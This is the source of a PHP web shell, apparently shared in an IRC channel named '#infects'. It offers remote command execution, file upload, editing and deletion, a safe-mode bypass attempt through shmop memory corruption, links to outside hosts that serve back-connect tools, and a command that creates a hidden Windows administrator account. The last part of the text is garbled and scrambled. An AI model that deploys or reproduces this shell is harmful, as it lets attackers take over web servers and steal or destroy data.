irc.efnet.org - #infects <?php @set_time_limit(0); $string = $_SERVER['QUERY_STRING']; $mhost = 'http://www.education.zp.ua/images/down.jpg?'; $host_all = explode("$mhost", $string); $s1 = $host_all[0]; $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost; $OS = @PHP_OS; $IpServer = '127.0.0.1'; $UNAME = @php_uname(); $PHPv = @phpversion(); $SafeMode = @ini_get('safe_mode'); if ($SafeMode == '') { $SafeMode = " OFF"; } else { $SafeMode = "$SafeMode"; } $btname = 'backtool.txt'; $bt = 'http://www.full-comandos.com/jobing/r0nin'; $dc = 'http://www.full-comandos.com/jobing/dc.txt'; $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup "Administrators" /add Admin;net localgroup "Users" /del Admin'; // Java Script echo ""; // End JavaScript /* Functions */ function cmd($CMDs) { $CMD[1] = ''; exec($CMDs, $CMD[1]); if (empty($CMD[1])) { $CMD[1] = shell_exec($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = passthru($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = system($CMDs); } elseif (empty($CMD[1])) { $handle = popen($CMDs, 'r'); while(!feof($handle)) { $CMD[1][] .= fgets($handle); } pclose($handle); } return $CMD[1]; } if (@$_GET['chdir']) { $chdir = $_GET['chdir']; } else { $chdir = getcwd()."/"; } if (@chdir("$chdir")) { $msg = "Entrance in the directory, OK!"; } else { $msg = "Error to enters it in the directory!"; $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']); } $chdir = str_replace(chr(92), chr(47), $chdir); if (@$_GET['action'] == 'upload') { $uploaddir = $chdir; $uploadfile = $uploaddir. $_FILES['userfile']['name']; if (@move_uploaded_file($_FILES['userfile'] ['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) { $msg = "{$_FILES['userfile']['name']}, the archive is validates and was loaded successfully."; } else { $msg = "Error when copying archive."; } } elseif (@$_GET['action'] == 'mkdir') { $newdir = $_GET['newdir']; if (@mkdir("$chdir"."$newdir")) { $msg = "{$newdir}, directory created successfully."; } else { $msg = "Error to it creates directory."; } } elseif (@$_GET['action'] == 'newfile') { $newfile = $_GET['newfile']; if (@touch("$chdir"."$newfile")) { $msg = "{$newfile}, created successfully!"; } else { $msg = "Error to tries it creates archive."; } } elseif (@$_GET['action'] == 'del') { $file = $_GET['file']; $type = $_GET['type']; if ($type == 'file') { if (@unlink("$chdir"."$file")) { $msg = "{$file}, successfully excluded archive!"; } else { $msg = "Error to it I excluded archive!"; } } elseif ($type == 'dir') { if (@rmdir("$chdir"."$file")) { $msg = "{$file}, successfully excluded directory!"; } else { $msg = "Error to it I excluded directory!"; } } } elseif (@$_GET['action'] == 'chmod') { $file = $chdir. $_GET['file']; $chmod = $_GET['chmod']; if (@chmod ("$file", $chmod)) { $msg = "Chmod of {$_GET['file']} moved for $chmod successfully."; } else { $msg = 'Error when moving chmod.'; } } elseif (@$_GET['action'] == 'rename') { $file = $_GET['file']; $newname = $_GET['newname']; if (@rename("$chdir"."$file", "$chdir"."$newname")) { $msg = "Archive {$file} named for {$newname} successfully!"; } else { $msg = "Error to it nominates archive."; } } elseif (@$_GET['action'] == 'copy') { $file = $chdir.$_GET['file']; $copy = $_GET['fcopy']; if (@copy("$file", "$copy")) { $msg = "{$file}, copied for {$copy} successfully!"; } else { $msg = "Error when copying {$file} for {$copy}"; } } /* Parte Atualiza 02:48 12/2/2006 */ elseif (@$_GET['action'] == 'cmd') { if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; } if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; } $cmd = stripslashes(trim($cmd)); $result_arr = cmd($cmd); $afim = count($result_arr); $acom = 0; $msg = ''; $msg .= " Results: ".$cmd." "; if ($result_arr) { while ($acom <= $afim) { $msg .= " ".@$result_arr[$acom]." "; $acom++; } } else { $msg .= " Erro ao executar comando. "; } } elseif (@$_GET['action'] == 'safemode') { if (@!extension_loaded('shmop')) { echo "Loading... module "; if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) { @dl('php_shmop.dll'); } else { @dl('shmop.so'); } } if (@extension_loaded('shmop')) { echo "Module: shmop loaded! "; $shm_id = @shmop_open(0xff2, "c", 0644, 100); if (!$shm_id) { echo "Couldn't create shared memory segment\n"; } $data="\x00"; $offset=-3842685; $shm_bytes_written = @shmop_write($shm_id, $data, $offset); if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; } if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; } echo passthru("id"); shmop_close($shm_id); } else { echo "Module: shmop not loaded! "; } } elseif (@$_GET['action'] == 'zipen') { $file = $_GET['file']; $zip = @zip_open("$chdir"."$file"); $msg = ''; if ($zip) { while ($zip_entry = zip_read($zip)) { $msg .= "Name: " . zip_entry_name($zip_entry) . "\n"; $msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n"; $msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n"; $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n"; if (zip_entry_open($zip, $zip_entry, "r")) { echo "File Contents:\n"; $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)); echo "$buf\n"; zip_entry_close($zip_entry); } echo "\n"; } zip_close($zip); } } elseif (@$_GET['action'] == 'edit') { $file = $_GET['file']; $conteudo = ''; $filename = "$chdir"."$file"; $conteudo = @file_get_contents($filename); $conteudo = htmlspecialchars($conteudo); $back = $_SERVER['HTTP_REFERER']; echo " Editing {$file} ... "; echo ""; echo ""; echo " "; echo " "; echo "
{$conteudo} "; print " "; echo "
"; echo "
\"Save\"
"; echo "
\"Closes
"; echo "
"; echo ""; echo ""; echo " "; } elseif (@$_GET['action'] == 'save') { $filename = "$chdir".$_GET['file']; $somecontent = $_POST['S1']; $somecontent = stripslashes(trim($somecontent)); if (is_writable($filename)) { @$handle = fopen ($filename, "w"); @$fw = fwrite($handle, $somecontent); @fclose($handle); if ($handle && $fw) { $msg = "{$_GET['file']}, edited successfully!"; } } else { $msg = "{$_GET['file']}, cannot be written!"; } } //
Informa??es $cmdget = ''; if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; } if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; } $cmdget = htmlspecialchars($cmdget); function asdads() { $asdads = ''; if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; } if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; } if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; } if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; } if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; } return $asdads; } echo " "; echo ""; echo "Informa??es"; echo ""; echo ""; echo " "; echo " Sistema:
{$OS}"; echo ""; echo ""; echo "
"; echo " "; echo " Uname:
{$UNAME}"; echo ""; echo ""; echo "
"; echo " "; echo " PHP:
{$PHPv}, safe mode: {$SafeMode}"; echo ""; if (strtoupper(substr($OS, 0,3) != 'WIN')) { $Methods = asdads(); if ($Methods == '') { $Methods = "???"; } echo ""; echo "
"; echo " "; echo " Methods:
{$Methods}"; echo ""; } echo ""; echo "
"; echo " "; echo " Ip:
{$IpServer}"; echo ""; echo ""; echo "
"; echo " "; echo " Command:
\"{$cmdget}\"
\"Send\"
"; echo ""; echo "
"; echo " "; echo " "; // Dir echo " "; echo ""; if (is_writable("$chdir")) { if (strtoupper(substr($OS, 0,3) == 'WIN')) { echo "Dir YES: {$chdir} - [New Dir] [New File] [Remote Access]"; } else { echo "Dir YES: {$chdir} - [New Dir] [New File] [BackTool]"; } } else { if (strtoupper(substr($OS, 0,3) == 'WIN')) { echo "Dir NO: {$chdir} - [New Dir] [New File] [Remote Access]"; } else { echo "Dir NO: {$chdir} - [New Dir] [New File] [BackTool]"; } } if (@!$handle = opendir("$chdir")) { echo " I could not enters in the directory, click here! for return to the original directory! "; } else { echo " "; echo " "; echo " Upload:"; echo "
echo "
\"Send\" echo " "; echo " "; echo " "; echo " "; echo " "; echo " "; if (@!$msg) { echo " Messages"; } else { echo "
";
";
$msg"; } echo " "; echo " "; echo " "; echo " "; echo " "; echo "
Perms"; echo "
$perms"; if (@is_writable ("$chdir"."$file")) { if ($mode == 'chdir') { if ($file == '../') { echo "
File "; Size "; echo " echo "
$file"; } else { echo "
Commands"; echo " "; $colorn = 0; while (false !== ($file = readdir($handle))) { if ($file != '.') { if ($colorn == 0) { $color = "style=\"backgroundcolor: #FFCC66\""; } elseif ($colorn == 1) { $color = "style=\"backgroundcolor: #C0C0C0\""; } if (@is_dir("$chdir"."$fil e")) { $file = $file.'/'; $mode = 'chdir'; } else { $mode = 'edit'; } if (@substr("$chdir", strlen($chdir) -1, 1) ! = '/') { $chdir .= '/'; } if ($file == '../') { $lenpath = strlen($chdir); $baras = 0; for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } } $chdir_ = explode("/", $chdir); $chdirpox = str_replace($chdir_[$ baras-1].'/', "", $chdir); } $perms = @fileperms ("$chdir"."$file"); if ($perms == '') { $perms = '???'; } $size = @filesize ("$chdir"."$file"); $size = $size / 1024; $size = explode(".", $size); if (@$size[1] ! = '') { $size = $size[0].'.'.@substr(" $size[1]", 0, 2); } else { $size = $size[0]; } if ($size == 0) { if ($mode == 'chdir') { $size = '???'; } } echo ""; echo "
$file"; } } else { if (is_readab $file"; } else le("$chdir" { echo " ."$file")) { echo "
$file"; } } } else { if $file"; ($mode } else == 'chdir') { echo { if ($file " == '../') { echo "
$file"; } } $size KB" else { if $file"; ; if (@is_reada } else $file"; } } } [Rename] [Del] [Chmod ($mode ble("$chdir { echo echo " ; } else { echo " == 'edit') "."$file")) { " { echo " echo "